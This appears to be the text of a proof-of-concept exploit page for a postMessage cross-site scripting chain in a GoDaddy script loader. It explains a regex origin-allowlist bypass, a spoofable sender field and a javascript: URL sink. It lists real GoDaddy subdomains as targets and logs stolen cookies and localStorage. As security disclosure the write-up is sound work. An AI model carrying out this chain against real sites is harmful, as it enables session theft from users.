Attack Chain
Source โ Sink Flow
Source โ
window.addEventListener("message", handleIframeMessage)airo-sentinel loader registers a postMessage listener on every page it loads. Accepts messages from t.origin and t.data โ both fully attacker-controlled.
Gate 1 (bypassed) โ
j(t.origin) โ Broken regex allowlist
Checks origin against /^https:\/\/([\w-]+\.)*(test-)*(dev-)*godaddy\.com$/
This domain passes because (test-)* matches
This domain passes because (test-)* matches
test- and (dev-)* matches dev-dev- (two repetitions), making the TLD godaddy.com of this domain satisfy the check.
Gate 2 (bypassed) โ
if (sender !== "airo-hq") returnChecks t.data.sender. Bypassed by including sender: "airo-hq" in the message payload โ this is data we control, not a cryptographic token.
Router โ
switch(action) โ case "navigate"The action field in our payload is set to "navigate", routing execution to the
H() function with t.data.value.data as the argument.Sink โ
H({path, absolute:true}) โ window.open(new URL(path), "_self")
With absolute: true, the function calls new URL(path) with no base โ this allows
javascript: URLs. Then window.open(jsURL, "_self") executes our code in the GoDaddy page context, with full access to cookies, localStorage, and session tokens.
Regex Breakdown
Why the regex fails
^https://
([\w-]+\.)*
matches "www."
(test-)*
matches "test-"
(dev-)*
matches "dev-dev-"
godaddy\.com$
matches TLD of this domain
https://hub.godaddy.com
Legitimate โ passes correctly
https://www.godaddy.com
Legitimate โ passes correctly
loading...
This domain โ passes (regex bypass)
https://test-dev-godaddy.com
Attacker variant โ also passes
https://evil.com
Blocked correctly
Target & Action
Select Target Domain
hub.godaddy.com
GoDaddy Pro Hub
dashboard.godaddy.com
Main Dashboard
dcc.godaddy.com
Domain Control Center
productivity.godaddy.com
Email & Office
sso.godaddy.com
Single Sign-On
pro.godaddy.com
GoDaddy Pro
Select Payload
Live Log
โ
Execution confirmed โ data received from target
Domain
โ
URL
โ
Cookies
โ
localStorage
โ